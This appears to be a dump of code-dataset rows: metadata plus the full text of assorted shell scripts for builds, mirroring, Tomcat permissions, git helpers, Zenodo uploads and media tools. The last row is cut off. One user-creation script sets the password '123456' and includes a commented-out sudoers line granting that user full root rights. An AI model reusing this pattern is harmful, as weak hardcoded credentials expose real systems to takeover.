blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
a75467d4c8a08402fdc2869d978c7f4858c7d478
|
Shell
|
HumboldtWirelessLab/click-brn-scripts
|
/500-experiments/003-interference-measurement/evaluation/eval.sh
|
UTF-8
| 980
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
dir=$(dirname "$0")
pwd=$(pwd)
SIGN=`echo $dir | cut -b 1`
case "$SIGN" in
"/")
DIR=$dir
;;
".")
DIR=$pwd/$dir
;;
*)
echo "Error while getting directory"
exit -1
;;
esac
if [ "x$RESULTDIR" = "x" ]; then
if [ "x$1" = "x" ]; then
echo "Use: \"RESULTDIR=dir $0\" or \"$0 dir\""
exit 0
else
RESULTDIR=$1
fi
fi
SIGN=`echo $RESULTDIR | cut -b 1`
case "$SIGN" in
"/")
;;
*)
RESULTDIR="$PWD/$RESULTDIR"
;;
esac
#echo $RESULTDIR
#echo $PWD
#echo $DIR
$DIR/merge_xml.sh $RESULTDIR/ > $PWD/interference_exp.xml
xsltproc $DIR/interference2mat.xslt $PWD/interference_exp.xml > $PWD/interference_exp.mat.tmp
SEDARG=`cat $PWD/interference_exp.mat.tmp | sed "s#,# #g" | awk '{print $2}' | uniq | awk '{print "-e s#"$1"#"NR"#g"}' | tr '\012' ' '`
cat $PWD/interference_exp.mat.tmp | sed $SEDARG -e "s#none#0#g" > $PWD/interference_exp.mat
rm -rf $PWD/interference_exp.mat.tmp
| true
|
c74527f8a7bc5da337e241b32ec579c3583b7794
|
Shell
|
ZVlad1980/adm_scripts
|
/api/installer/launch.sh
|
UTF-8
| 842
| 3.171875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -o errexit
set -o pipefail
set -o nounset
declare -r __dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
declare -r __dir_log="${__dir}/logs"
declare -r __dir_ora="${__dir}/oracle"
declare -r __dir_ora_scripts="${__dir_ora}/scripts"
declare -r __dir_repos="${__dir}/repos"
declare -r __log_file="${__dir_log}/install_$(date +%y%m%d)_$(date +%H%M)_${$}.log"
declare -r __curr_dir=$(pwd)
declare -r __only_scripts="${PDH_INST_ONLY_SCRIPTS-1}"
declare __result
mkdir -p "${__dir_log}"
mkdir -p "${__dir_repos}"
. "${__dir_ora}/env/ora.env"
. "${__dir}/util.sh"
. "${__dir}/oracle_api.sh"
. "${__dir}/installer.sh"
. "${__dir}/install_api.sh"
trap finalize INT TERM EXIT
out "Log file: ${__log_file}"
set_log_file "${__log_file}"
out "Launcher start, parameters: ${*-Without parameters}"
install "${@}"
exit 0
| true
|
0481f2b3d4837bd4c169cfae861930b628230f95
|
Shell
|
IKAMTeam/depl-scripts
|
/config-tomcat-security.sh
|
UTF-8
| 1,049
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
### Script for configure Tomcat filesystem security ###
# shellcheck source=utils.sh
. "$(dirname "$0")/utils.sh"
require_root_user
# Remove unresolvable symbolic links to prevent 'cannot dereference' error from chown/chmod
find -L "$TOMCAT_PATH" -type l -exec sh -c 'realpath "$1" &> /dev/null || (echo "Removing $1"; rm -f "$1")' -- {} +
chown -LR "$(whoami):$TOMCAT_GROUP" "$TOMCAT_PATH" || exit 1
find -L "$TOMCAT_PATH" -type d -exec chmod g+r,g-w,g+s,g+x,o-r,o-w,o-x {} + || exit 1
find -L "$TOMCAT_PATH" -type f -exec chmod g+r,g-w,o-r,o-w,o-x {} + || exit 1
find "$TOMCAT_PATH"/* -maxdepth 1 -type d \( -name 'css' -or -name 'img' \) -exec chmod -R g+w {} + || exit 1
chmod -R g+w "$TOMCAT_PATH/logs" "$TOMCAT_PATH/temp" "$TOMCAT_PATH/work" || exit 1
setfacl -LRd -m u::rwx "$TOMCAT_PATH" || exit 1
setfacl -LRd -m g::r-x "$TOMCAT_PATH" || exit 1
setfacl -LRd -m o::--- "$TOMCAT_PATH" || exit 1
setfacl -LRd -m g::rwx "$TOMCAT_PATH/logs" "$TOMCAT_PATH/temp" "$TOMCAT_PATH/work" || exit 1
echo "Permissions successfully set"
| true
|
6788e887228de8aa3b94869d01dfde64fc4f29de
|
Shell
|
maxieds/GATechGTDMMBSoftwareBackup
|
/RNADB-construction/rna2ndary/UtilityScripts/RunRNADBConstruction-MathMulberry.sh
|
UTF-8
| 1,491
| 3.5
| 4
|
[] |
no_license
|
## Usage: RunRNADBConstruction.sh [SequenceDataInputDir] [SequenceDataOutputDir]
#!/usr/bin/env bash
PYTHON3=`which python3`
MATH_MULBERRY_SRC=/projects/rna/RNADBConstructionScript
SEQDATA_INDIR="$MATH_MULBERRY_SRC/RNADB-sequence-data/DatabaseSequenceData"
SAMPLE_OUTDIR=./RNADBConstructionScriptOutput-`date +"%Y.%m.%d-%H%M%S"`
AppendedScriptOptions=( "${@:1:${#@}}" )
if [[ "$1" != "" ]]; then
SEQDATA_INDIR=$1
AppendedScriptOptions=( "${@:2:${#@}-2}" )
fi
if [[ "$2" != "" ]]; then
SAMPLE_OUTDIR=$2
AppendedScriptOptions=( "${@:3:${#@}-2}" )
fi
mkdir -p $SAMPLE_OUTDIR
rm -rf $SAMPLE_OUTDIR/*
GTFPYTHON_INSTALL_PATH="$MATH_MULBERRY_SRC/GTFoldPython/Python/PythonLibrarySrc"
GTFPYTHON_INSTALL_LIBS_PATH="$MATH_MULBERRY_SRC/GTFoldPython/Python/Lib"
RUNNER_SCRIPT_PATH="$MATH_MULBERRY_SRC/RNADB-construction/rna2ndary"
export PYTHONPATH="$GTFPYTHON_INSTALL_PATH:$RUNNER_SCRIPT_PATH"
export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:$GTFPYTHON_INSTALL_PATH"
export DYLD_LIBRARY_PATH="$DYLD_LIBRARY_PATH:$GTFPYTHON_INSTALL_LIBS_PATH"
export DYLD_FALLBACK_LIBRARY_PATH="/usr/lib:/usr/local/lib:$DYLD_FALLBACK_LIBRARY_PATH"
$PYTHON3 $RUNNER_SCRIPT_PATH/GenerateRNADBSequenceData.py \
--InDir=$SEQDATA_INDIR \
--OutDir=$SAMPLE_OUTDIR \
--OutCSV=$SAMPLE_OUTDIR/rnadb-sample-out.csv \
`echo $AppendedScriptOptions`
echo -e "\nNOTE: If you had errors running the script try running the following command first:"
echo -e " $ pip3 install --user numpy requests\n"
| true
|
4cd2ed40bfc187385dcb36f7b771b97f5e1c1107
|
Shell
|
ssb22/indexer
|
/html2apk/compile.sh
|
UTF-8
| 2,312
| 2.765625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
export SDK=/usr/local/adt-bundle-mac-x86_64-20140702/sdk # or whatever
export PLATFORM="$SDK"/platforms/android-19 # or whatever
export BUILD_TOOLS="$SDK"/build-tools/21.0.2 # or whatever
export KEYSTORE_USER=my_user_id # if you want to sign the apk
export KEYSTORE_PASS=my_password # ditto
export KEYSTORE_FILE=/path/to/your/keystore
export APPNAME=MyApp
export PACKAGE_NAME=org/ucam/ssb22/html # PLEASE CHANGE THIS
cd /path/to/your/app/workspace &&
rm -rf bin gen && mkdir bin gen &&
"$BUILD_TOOLS"/aapt package -v -f -I $PLATFORM/android.jar -M AndroidManifest.xml -A assets -S res -m -J gen -F bin/resources.ap_ &&
javac -classpath $PLATFORM/android.jar -sourcepath "src;gen" -d "bin" src/$PACKAGE_NAME/*.java gen/$PACKAGE_NAME/R.java &&
if "$BUILD_TOOLS"/dx --help 2>&1 >/dev/null | grep min-sdk-version >/dev/null; then
"$BUILD_TOOLS"/dx --min-sdk-version=1 --dex --output=bin/classes.dex bin/
elif [ -e "$BUILD_TOOLS"/dx ]; then "$BUILD_TOOLS"/dx --dex --output=bin/classes.dex bin/
else "$BUILD_TOOLS"/d8 --min-api 1 --output bin $(find bin -type f -name '*.class'); fi &&
cp bin/resources.ap_ bin/$APPNAME.ap_ && # change $APPNAME here and all instances below
cd bin &&
"$BUILD_TOOLS"/aapt add $APPNAME.ap_ classes.dex &&
cd .. &&
rm -f bin/$APPNAME.apk ../$APPNAME.apk &&
if test -e "$BUILD_TOOLS"/apksigner; then
"$BUILD_TOOLS"/zipalign 4 bin/$APPNAME.ap_ bin/$APPNAME.apk &&
"$BUILD_TOOLS"/apksigner sign --ks "$KEYSTORE_FILE" --v1-signer-name "$KEYSTORE_USER" --ks-pass env:KEYSTORE_PASS --key-pass env:KEYSTORE_PASS --out ../$APPNAME.apk bin/$APPNAME.apk
else # old ADT
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore "$KEYSTORE_FILE" -storepass $KEYSTORE_PASS -keypass $KEYSTORE_PASS -signedjar bin/$APPNAME.apk bin/$APPNAME.ap_ $KEYSTORE_USER -tsa http://timestamp.digicert.com && # -tsa option requires an Internet connection
"$BUILD_TOOLS"/zipalign 4 bin/$APPNAME.apk ../$APPNAME.apk
fi &&
rm bin/*ap_ bin/*apk &&
cd .. || exit 1
# Install on any attached devices:
(sleep 300 ; killall adb) & # in case the following command gets stuck when unattended
export adb="$SDK"/platform-tools/adb
for D in $($adb devices|grep device$|cut -f1); do $adb -s "$D" install -r ~/Documents/workspace/RTE.apk; done || true # no error if no device connected
| true
|
553e461819d45b933e94ffff3e946c7f5e1b1842
|
Shell
|
xieydd/shell
|
/system/create_user_centos.sh
|
UTF-8
| 280
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
USER_COUNT=`cat /etc/passwd | grep '^xieydd:' -c`
USER_NAME='xieydd'
if [ $USER_COUNT -ne 1 ]
then
useradd $USER_NAME
echo "123456" | passwd $USER_NAME --stdin
else
echo 'user exits'
fi
# visudo
#sed -i '/root ALL=(ALL) ALL/a\xieydd ALL=(ALL) ALL' /etc/sudoers
| true
|
512b410707de1dc1aa86ce56b217385e71777c78
|
Shell
|
YukariChiba/mirrors_sync
|
/sync/rsync_common.sh
|
UTF-8
| 682
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
touch $sync_path/status/$sync_name
if [[ `cat "$sync_path/status/$sync_name"` != "syncing" ]];
then
echo "[$sync_name] Syncing..."
echo "syncing" > "../$sync_name"
rsync -rltz4 --progress --delete --log-file="$sync_path/log/$sync_name.log" "$sync_url/$sync_name" "$sync_path/data/$sync_name"
if [ $? -ne 0 ] ;
then
echo "[$sync_name] Sync failed.";
echo "failed" > "$sync_path/status/$sync_name";
else
echo "[$sync_name] Sync completed.";
echo "normal" > "$sync_path/status/$sync_name";
fi
else
echo "[$sync_name] Disabled, skipping..."
fi
| true
|
3be095366e9409981fdbb005c655e8b04f7f69a0
|
Shell
|
edouard-lopez/dotfiles
|
/includes/posix/git.bash
|
UTF-8
| 1,521
| 4.28125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
function configure() {
# GITHUB
# Create a repo on github and connect it to local repo
# @param $1|$project project name
# @param $2|server remote server
# @param $3|$user remote user account
# @return void
function github-new() {
local project="${1:-git-$RANDOM}"
local server="${2:-github.com}"
local user="${3:-edouard-lopez}"
# create directory if missing
[[ "$(basename "$(pwd)")" != "$project" ]] && mkdir "$project"
# connnect to remote repo
git remote add origin https://"$server"/"$user"/"$project".git
# pull README and stuff like that
git pull origin master
# push local files
git push origin master
}
# Add existing remote branch to the remote 'all' so you can:
# git push all
# @return void
function git-add-to-push-all() {
# Fields are: 'name', 'url' and 'method'
while read -r name url method; do
printf "Adding remote: %s (%s, %s)\n" "$name" "$url" "$method"
git config --add remote.all.url "$url"
done < <(git remote -v | awk '!/^all/ && /push/')
}
# Pull and track all remote branches
function git-pull-all() {
while read -r branch; do
printf "Pulling remote: %s\n" "$branch"
git branch --track "${branch#remotes/origin/}" "$branch"
done < <(git branch -a | grep remotes | grep -v HEAD | grep -v master)
}
}
configure
| true
|
f64ee3167f6b06257bf0ee6beee81f0cdc4cc839
|
Shell
|
windystrife/UnrealEngine_NVIDIAGameWorks
|
/Engine/Source/ThirdParty/SDL2/build.sh
|
UTF-8
| 925
| 3.640625
| 4
|
[
"MIT",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
#!/bin/bash
Architecture=x86_64-unknown-linux-gnu
#Architecture=i686-unknown-linux-gnu
#Architecture=aarch64-unknown-linux-gnueabi
BuildWithOptions()
{
local BuildDir=$1
local SdlDir=$2
local SdlLibName=$3
shift
shift
shift
local Options=$@
rm -rf $BuildDir
mkdir -p $BuildDir
pushd $BuildDir
cmake $Options $SdlDir
#exit 0
make -j 4
mkdir -p $SdlDir/lib/Linux/$Architecture/
cp --remove-destination libSDL2.a $SdlDir/lib/Linux/$Architecture/$SdlLibName
popd
}
set -e
SDL_DIR=SDL-gui-backend
BUILD_DIR=build-$SDL_DIR
# build Debug with -fPIC so it's usable in any type of build
BuildWithOptions $BUILD_DIR-Debug ../$SDL_DIR libSDL2_fPIC_Debug.a -DCMAKE_BUILD_TYPE=Debug -DSDL_STATIC_PIC=ON
#exit 0
BuildWithOptions $BUILD_DIR-Release ../$SDL_DIR libSDL2.a -DCMAKE_BUILD_TYPE=Release
BuildWithOptions $BUILD_DIR-ReleasePIC ../$SDL_DIR libSDL2_fPIC.a -DCMAKE_BUILD_TYPE=Release -DSDL_STATIC_PIC=ON
set +e
| true
|
4965cbd3c59e0a6e0cd684d564510235b642b6b7
|
Shell
|
AmesianX/wasm-binary-security
|
/linear-memory-analysis/build.sh
|
UTF-8
| 1,301
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Clang wasi
compilers/wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot compilers/wasi/wasi-sysroot-8.0/wasi-sysroot main.c -O2 -o clang-wasi.wasm
compilers/wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot compilers/wasi/wasi-sysroot-8.0/wasi-sysroot main.c -O2 -Wl,--stack-first -o clang-stack-first-wasi.wasm
# Emscripten
compilers//emcc-upstream/emsdk/emsdk activate latest > /dev/null
. compilers//emcc-upstream/emsdk/emsdk_env.sh > /dev/null
which emcc
emcc main.c -O2 -o emcc-upstream.js
compilers//emcc-fastcomp/emsdk/emsdk activate latest-fastcomp > /dev/null
. compilers//emcc-fastcomp/emsdk/emsdk_env.sh > /dev/null
which emcc
emcc main.c -O2 -o emcc-fastcomp.js
# Rust
rustc --target=wasm32-wasi main.rs -O -o rust-wasi.wasm
# rustc --target=wasm32-unknown-emscripten main.rs -O -o rust-emscripten.wasm
# Binary information
for wasm in *.wasm
do
echo "$wasm"
wasm2wat --generate-names "$wasm" > "$wasm.wat"
wasm-objdump -xh "$wasm" > "$wasm.objdump"
rg 'global \$g\d+' "$wasm.wat" | cat
rg 'data.*global const' "$wasm.wat" | cut -c-100
done
# Dynamic information
for js in emcc-*.js
do
echo "$js"
node "$js" | tee "$js.stdout"
done
for wasm in *-wasi.wasm
do
echo "$wasm"
wasmtime "$wasm" | tee "$wasm.stdout"
done
| true
|
e1b6fb58918c619272dc20ef7986fb0bd46c947f
|
Shell
|
domogik/domogik-website
|
/src_closed/build.sh
|
UTF-8
| 346
| 3.359375
| 3
|
[] |
no_license
|
TEMPLATE_DIR=./templates
STATIC_DIR=./static
BUILD_DIR=../build
# clean build
mkdir -p $BUILD_DIR
rm -Rf $BUILD_DIR/*
# generate html
for tpl in index
do
cat $TEMPLATE_DIR/header.tpl $TEMPLATE_DIR/$tpl.tpl $TEMPLATE_DIR/footer.tpl > $BUILD_DIR/$tpl.html
done
# copy static
for fic in $STATIC_DIR/*
do
cp -Rp $fic $BUILD_DIR/
done
| true
|
e620757f0267baac628b78b6e7ed5e174ec71ecc
|
Shell
|
Vauxoo/travis2docker
|
/src/travis2docker/templates/rvm_env.sh
|
UTF-8
| 372
| 3.640625
| 4
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Load RVM into a shell session *as a function*
if [[ -s "$HOME/.rvm/scripts/rvm" ]] ; then
# First try to load from a user install
source "$HOME/.rvm/scripts/rvm"
elif [[ -s "/usr/local/rvm/scripts/rvm" ]] ; then
# Then try to load from a root install
source "/usr/local/rvm/scripts/rvm"
else
printf "An RVM installation was not found.\n"
fi
| true
|
24ce904b8bce31fc40ebe3bcec86c2791f2e0089
|
Shell
|
libscie/liberator
|
/bin/zenodo-deposit.sh
|
UTF-8
| 3,506
| 3.53125
| 4
|
[
"LicenseRef-scancode-public-domain",
"CC0-1.0"
] |
permissive
|
#!/bin/bash
# Return error if arg is missing
if [ ! "$1" ]; then
echo "Please point towards cmine project directory"
exit 1
fi
for path in $(ls $1/*/ -d)
do
if [ -f "$path/fulltext.pdf" ]; then
# Include country
PUB=$(jq '.["publisher"]' "$path"crossref_result.json)
# Include year
YEAR=$(jq '.["published-print"]' "$path"crossref_result.json | jq '.["date-parts"][][]' | grep -P "\d{4}")
if [ $YEAR -gt 1886 ]; then
echo "This seems to published after 1886, so skipping this for now."
else
# Creator
NAME=$(jq '.["author"][] | .family + ", " + .given' "$path"crossref_result.json || echo NA)
AFFILIATION=$(jq '.["author"][]["affiliation"]' "$path"crossref_result.json || echo null)
NAMES=$(echo "$NAME" | tr '\n' ' ' | sed 's/"//g')
PUBLICATIONDATE=$(echo $(jq '.["published-print"]' "$path"crossref_result.json | jq '.["date-parts"][][]') | cut -d" " -f1)
TITLE=$(jq .title[] "$path"crossref_result.json)
CREATOR=$()
# DESCRIPTION=$(scripts/description.sh $PUB $YEAR)
DESCRIPTION="Any copyright on this work is most likely expired, given life expectancy and copyright duration at the time of publication, or when rolling copyright occurred (i.e., changes to the legislation extending the copyright term). In case of a takedown request, the depositor requests to be provided with legal documentation from the person/organization instigating the takedown request and to be heard by Zenodo before making a decision about the takedown."
LICENSE="other-pd"
DOI=$(jq .DOI "$path"crossref_result.json)
NOTES="This file was uploaded by Chris Hartgerink (chris@libscie.org),
not the original authors or the publisher. This upload is part of
ensuring public access to the public domain.
Please see description for legal justification of why this work is (likely to be)
in the public domain and it is considered reasonable to be uploaded to Zenodo."
JOURNAL=$(jq '.["container-title"][]' "$path"crossref_result.json | tail -n 1)
VOLUME=$(jq .volume "$path"crossref_result.json)
ISSUE=$(jq .issue "$path"crossref_result.json)
PAGES=$(jq .page "$path"crossref_result.json)
DATA=$(cat <<EOF
{"metadata":{
"upload_type": "publication",
"publication_type": "article",
"publication_date": "1823-01-01",
"title": $TITLE,
"creators": [{"name":"$NAMES"}],
"description": "$DESCRIPTION",
"access_right": "open",
"license": "$LICENSE",
"doi": $DOI,
"keywords": ["public-domain"],
"notes": "$NOTES",
"journal_title": $JOURNAL,
"journal_volume": $VOLUME,
"journal_issue": $ISSUE,
"journal_pages": $PAGES,
"communities": [{"identifier":"libscie"}]}}
EOF
)
echo $DATA > "$path"zenodo-deposit.json
cat "$path"zenodo-deposit.json
# Create deposit
curl -iv -H "Content-Type: application/json" -X POST https://zenodo.org/api/deposit/depositions/?access_token=$TOKEN \
--data @"$path"zenodo-deposit.json | tee "$path"zenodo.json
# Get zenodo id
zid=$(cat "$path"zenodo.json|tr , '\n'|awk '/"id"/{printf"%i",$2}')
echo $zid
# Add file to deposit
curl -i -F name=fulltext.pdf -F file=@"$path"fulltext.pdf https://zenodo.org/api/deposit/depositions/$zid/files?access_token=$TOKEN
# Publish deposit
curl -i -X POST "https://zenodo.org/api/deposit/depositions/$zid/actions/publish?access_token=$TOKEN"
fi
fi
done
| true
|
ebc60c65354bd17d2077137866707b51ad5f86f2
|
Shell
|
Darcos90/repositorio-scripts-alumnos
|
/simulacro02_JuanTonda.sh
|
UTF-8
| 769
| 3.3125
| 3
|
[] |
no_license
|
#script: 2 arrays , uno con el nombre de 6 amigos; y otro con sus telefonos
#!bin/bash
# declare -a para la declaración del array
# declaracion de 2 arrays usuario (nombre de amigos)
# y telefono (para los telefonos), colocados en orden de los amigos
#
# JUAN TONDA. Octubre 2017. simulacro02 /arrays
clear
contador=0
declare -a usuario=( Alberto Roberto Laura Sergio Cristian Dani )
declare -a telefonos=( 911 811 711 611 511 411 )
echo "Datos cargados en el array"
clear
for valor in ${usuario[*]}
do
echo $valor
contador=`expr $contador + 1`
done
read -p " Dime el nombre del amigo : " amigo
contador=0
for valor in ${usuario[*]}
do
if [ $valor = $amigo ]; then
telefono=${telefonos[$contador]}
fi
contador=`expr $contador + 1`
done
echo "el telefono de $amigo es $telefono"
| true
|
81dcef51a4096be2790293a38369e6bf8b68b30c
|
Shell
|
CJS-ES6-Module-Transformation-Research/transformation-tools
|
/timeTransformations.sh
|
UTF-8
| 813
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
numRuns=$1
projDir=$2
projName=$3
curDir=`pwd`
testOutFile=`echo $curDir`"/tests_$3_$1runs.out"
timeOutFile=`echo $curDir`"/time_$3_$1runs.out"
echo $timeOutFile
# if the time output file or test output file already exist,
# delete them, to avoid repeatedly appending and polluting the old
# data (move them to _old to avoid accidental deletion)
if test -f "$testOutFile"; then
mv $testOutFile `echo $testOutFile`_old
fi
if test -f "$timeOutFile"; then
mv $timeOutFile `echo $timeOutFile`_old
fi
./resetProject.sh $projDir
#cd $projDir
for x in $(eval echo {1..$1}); do
echo "Running transformation: " $x
{ time (./runTransformer.sh $projDir>> $testOutFile 2>&1) ; } 2>>$timeOutFile
./resetProject.sh $projDir
#{ time (node test/* >> $testOutFile 2>&1) ; } 2>>$timeOutFile
done
cd $curDir
| true
|
74c7fe6d7e297612905088f99e13893ad8ebdf4b
|
Shell
|
enchobelezirev/concourse
|
/oq.tests/crawling/SL4XS2/XS Deploy Service OQ Tests/Test Suites/XSA Components Acceptance Tests/Execute OQ Tests/NodeJS Sample Application Scenario/env.sh
|
UTF-8
| 765
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
current_dir="$(dirname -- "$(realpath -- "${BASH_SOURCE[0]}")")"
parent_dir="$(dirname -- "${current_dir}")";
if [ -f "${parent_dir}/env.sh" ] ; then
source "${parent_dir}/env.sh";
fi
export STEP_PATH="${STEP_PATH}/NodeJS Sample Application Scenario"
export ADDITIONAL_OPTIONS="--no-namespaces-for-services -e nodejs-test/config-op.mtaext"
export APP_LOCATION="nodejs-test"
export ASPACE_NAME="nodejs-sample"
export EXPECTED_APPLICATIONS="node-hello-world node-hello-world-backend node-hello-world-db"
export EXPECTED_SERVICES="node-hdi-container node-uaa"
export REPOSITORY_URL="https://github.wdf.sap.corp/xs2-samples/node-hello-world.git"
export SPACE_NAME="nodejs-sample"
export XSCLIENT_CONTEXTFILE="${RT_CLIENTS_HOME_ROOT}/${ASPACE_NAME}"
| true
|
d8b101b8512f1e72535625cd7ab57a80143d7265
|
Shell
|
sinoe9891/ejercicios_bash
|
/denis-tutoria-1/ejercicio4.sh
|
UTF-8
| 600
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
function nombreprint(){
echo "Por favor ingresar su nombre"
read nombre
hora=`date +"%H:%M"`
echo "Hola $nombre son las $hora"
}
function numberpro(){
echo "PID es: $$ "
}
function salir(){
echo "Se salió del programa"
exit
}
m=0;
while [ $m -eq 0 ]
do
echo "Bienvenido"
echo "1) Ingrese su nombre:"
echo "2) Muestra PID:"
echo "3) Salir"
echo "Ingrese el número de una de las opciones del menú:"
read menu
case $menu in
1)
nombreprint
;;
2) numberpro
;;
3)
salir
;;
*)
echo "Escoja una correcta opción menú"
;;
esac
done
| true
|
490d418a300c2e3e714992840000aca6921e96ce
|
Shell
|
chimay/configuration
|
/clifm/plugins/vid_viewer.sh
|
UTF-8
| 1,145
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
# Video thumbnails plugin for CliFM
# Written by L. Abramovich
SUCCESS=0
ERROR=1
if ! [ "$(which ffmpegthumbnailer 2>/dev/null)" ]; then
printf "CliFM: ffmpegthumbnailer: Command not found\n" >&2
exit $ERROR
fi
if [ -z "$1" ]; then
printf "CliFM: Missing argument\n" >&2
exit $ERROR
fi
TMP_DIR=".vidthumbs.$(tr -dc A-Za-z0-9 </dev/urandom | head -c6)"
mkdir -- "$TMP_DIR" >&2
for arg in "$@"; do
if [ -d "$arg" ]; then
if [ "$(printf "%s" "$arg" | tail -c1)" = '/' ]; then
# if [ ${arg: -1} = '/' ]; then
arg="${arg%?}"
fi
for file in "$arg"/*; do
if [ -f "$file" ]; then
ffmpegthumbnailer -i "$file" -o \
"$TMP_DIR/$(basename "$file").jpg" 2>/dev/null
fi
done
else
ffmpegthumbnailer -i "$arg" -o \
"$TMP_DIR/$(basename "$arg").jpg" 2>/dev/null
fi
done
if [ "$(which sxiv 2>/dev/null)" ]; then
sxiv -aqtr -- "$TMP_DIR"
elif [ "$(which feh 2>/dev/null)" ]; then
feh -tZk -- "$TMP_DIR"
elif [ "$(which lsix)" ]; then
lsix "$TMP_DIR"/*
else
printf "CliFM: No thumbails viewer found\n" >&2
rm -rf -- "$TMP_DIR" 2>/dev/null
exit $ERROR
fi
rm -rf -- "$TMP_DIR" 2>/dev/null
exit $SUCCESS
| true
|
cc08c4cbfc0d6918ff4ed4fba545a2af0a784eba
|
Shell
|
Snake4life/cambae
|
/clients/chaturbae/cb_client/bash_scripts/streamlink.sh
|
UTF-8
| 249
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
pid=0
USERNAME=$1
datetime=$2
function finish {
[ ${pid} -gt 0 ] && kill ${pid} 2>/dev/null
}
trap finish EXIT
streamlink -Q "http://www.chaturbate.com/${USERNAME}" worst -o "${USERNAME}-${datetime}.mkv" &
pid=$!
sleep "3"
finish
| true
|
b9cf0f5d7d9ddfdd6f48d83ced4ef4365f6f37ad
|
Shell
|
sonata-nfv/tng-schema
|
/package-specification/test/test_5gtango-vnf-package-example.sh
|
UTF-8
| 619
| 3.109375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -e
##
## Test package examples against schemas,
## e.g., NAPD, NSDs, VNFDs, REFs, ...
CMD=yamlvalidate
BASE_DIR=`dirname $0`
# schema paths
NAPD_SCHEMA=${BASE_DIR}/../napd-schema.yml
REF_SCHEMA=${BASE_DIR}/../ref-schema.yml
NSD_SCHEMA=${BASE_DIR}/../../service-descriptor/nsd-schema.yml
VNFD_SCHEMA=${BASE_DIR}/../../function-descriptor/vnfd-schema.yml
#
# Execute the tests.
#
${CMD} -s ${VNFD_SCHEMA} -y ${BASE_DIR}/../example-projects/5gtango-vnf-project-example/Definitions/myvnfd.yaml
${CMD} -s ${REF_SCHEMA} -y ${BASE_DIR}/../example-projects/5gtango-vnf-project-example/Images/mycloudimage.ref
| true
|
fb14dfe77805bbeff766c434abd23e69f3b6d649
|
Shell
|
FichteFoll/dotfiles
|
/bin/bin/video-to-gif
|
UTF-8
| 767
| 3.203125
| 3
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/usr/bin/env zsh
# parse args
_fps=(--fps 10)
zparseopts -D -E -K -fps:=_fps i:=_input o:=_output
fps=$_fps[2]
input=$_input[2]
output=$_output[2]
params=($@)
if [[ -z $1 || $1 == --help || $1 == -h || -z "$input" || -z "$output" ]]; then
echo "params:"
echo " --fps n (optional)"
echo " -i input"
echo " -o output"
exit 1
fi
# calculate delay setting for convert
# -r x => 1/x
# -delay AxB => A/B
# delay=$(( 1000 / $fps ))
# echo "fps: $fps; delay: $delay"
tmpdir=$(mktemp -d)
ffmpeg -i "$input" -r $fps $params "$tmpdir/out_%04d.png"
# convert $tmpdir/out_*.png -delay $delay -loop 0 -colors 32 -layers optimize "$output"
convert $tmpdir/out_*.png -colors 32 -delay 1x$fps -loop 0 -layers optimize "$output"
# gifsicle
rm -r $tmpdir
| true
|
92521b1852cc7acc36d80970bc271b822e3dd3fa
|
Shell
|
johnBgood/ansible
|
/ohmyzsh/roles/oh-my-zsh/files/bash_aliases
|
UTF-8
| 623
| 2.75
| 3
|
[] |
no_license
|
alias lla='ls -al'
alias ll='ls -lh'
# Global aliases -- These do not have to be
# at the beginning of the command line.
alias -g M='|more'
alias -g H='|head'
alias -g T='|tail'
alias -g L='|less'
# List only directories and symbolic
# links that point to directories
alias lsd='ls -ld *(-/DN)'
# List only file beginning with "."
alias lsa='ls -ld .*'
# Package manager
alias install='sudo apt-get install'
alias search='apt-cache search'
alias show='apt-cache show'
alias remove='sudo apt-get remove'
alias purge='sudo apt-get purge'
alias update='sudo apt-get update'
alias dist-upgrade='sudo apt-get dist-upgrade'
| true
|
e3761a8b417f7054e33ba3e7652f19792d286bba
|
Shell
|
DerekStride/dotfiles
|
/zsh/prompt.zsh
|
UTF-8
| 772
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
autoload colors && colors
# If the current path, with prefix replacement, has 3 or more elements `%3~`
# then return the directory we're in `%1/` else return the whole path `%2~`.
#
# The `~` in `%3~` means the current working directory but if it starts with
# $HOME, that part is replaced by a ‘~’. Changing it to `%3/` would not do the
# substitution, like we do with `%1/`.
directory_name() {
echo "%{$fg_bold[blue]%}%(3~|%1/|%2~)%{$reset_color%} "
}
prompt_arrow() {
echo "%{$fg_bold[green]%}➜%{$reset_color%} "
}
prompt_machine_info() {
if [[ -n "${SSH_CONNECTION-}${SSH_CLIENT-}${SSH_TTY-}" ]] || (( EUID == 0 )); then
echo "%{$fg_bold[magenta]%}%n%{$reset_color%} "
fi
}
export PROMPT=$'$(prompt_arrow)$(prompt_machine_info)$(directory_name)'
| true
|
6818d82050f5bfe6b1459568bbf5cf853be86cd9
|
Shell
|
tleonardi/tapRNAs
|
/scripts/other_analysis/ctcf_coverage.sh
|
